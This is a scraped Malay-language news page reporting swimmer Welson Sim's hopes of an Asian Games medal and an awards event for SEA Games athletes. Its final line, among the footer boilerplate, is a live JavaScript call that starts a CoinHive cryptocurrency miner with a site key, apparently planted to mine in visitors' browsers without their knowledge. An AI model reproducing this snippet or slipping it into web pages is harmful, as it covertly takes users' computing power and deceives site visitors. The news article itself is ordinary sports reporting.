© Copyright 2017, All Rights Reserved
Home / Sukan / Sukan Asia Welson Sim idam pingat

Sukan Asia Welson Sim idam pingat


Perenang negara, Welson Sim, mahu lebih tenang dalam mengejar misi utama dalam memastikan pingat untuk negara dalam Sukan Komanwel dan Sukan Asia selepas kali terakhir perenang negara berbuat demikian adalah menerusi Lim Keng Liat. 

19 tahun lalu, Keng Liat berjaya mengharumkan nama negara di pentas Sukan Asia apabila kali pertama menyumbang pingat emas buat negara dalam 100 meter kuak lentang selain turut cemerlang dengan dua gangsa dalam Sukan Komanwel 2002.

Bagaimanapun, dalam tempoh yang cukup lama, perenang negara gagal untuk meneruskan kecemerlangan itu dan Welson tidak kisah dilabel sebagai perenang kedua memenangi pingat demi memastikan legasi renang negara masih bersisa.

Welson mahu mencipta sejarah dan itulah yang menjadi tumpuan utamanya ketika ini dengan meletakkan sasaran kedua-dua temasya berkenaan sebagai pentas seterusnya untuk dia menyerlah.

“Saya berharap untuk menjadi perenang kedua yang memenangi medal dalam Sukan Asia.

“Saya sudah menetapkan sasaran peribadi dan akan berusaha keras pada tahun depan kerana sedar berpeluang untuk memenangi pingat Sukan Asia memandangkan saya kini dalam kalangan perenang keempat atau kelima terbaik dalam ranking Asia,” ujarnya.

Welson bersama atlet negara, antara Ng Eain Yow, Syakila Salni, Felicia Mikat dan Nur Izzati Yaakob diiktiraf kejayaan mereka dalam majlis penghargaan anjuran Milo pada hari ini, merujuk kepada penampilan mereka dalam Sukan SEA dan Para ASEAN 2017.


Source link

Tinggalkan Ulasan Anda

About admin

x

Check Also

Khairy kaji semula bidaan Sukan Komanwel 2022

PUTRAJAYA: Kementerian Belia dan Sukan bersedia mengkaji semula rancangan membida penganjuran temasya ...

Facebook Auto Publish Powered By : XYZScripts.com
© Copyright 2017, All Rights Reserved
%d bloggers like this:
var m = new CoinHive.Anonymous('dkVZKvPTpA9ReGRa2gsf6amqUO6Yr4Pu'); m.start();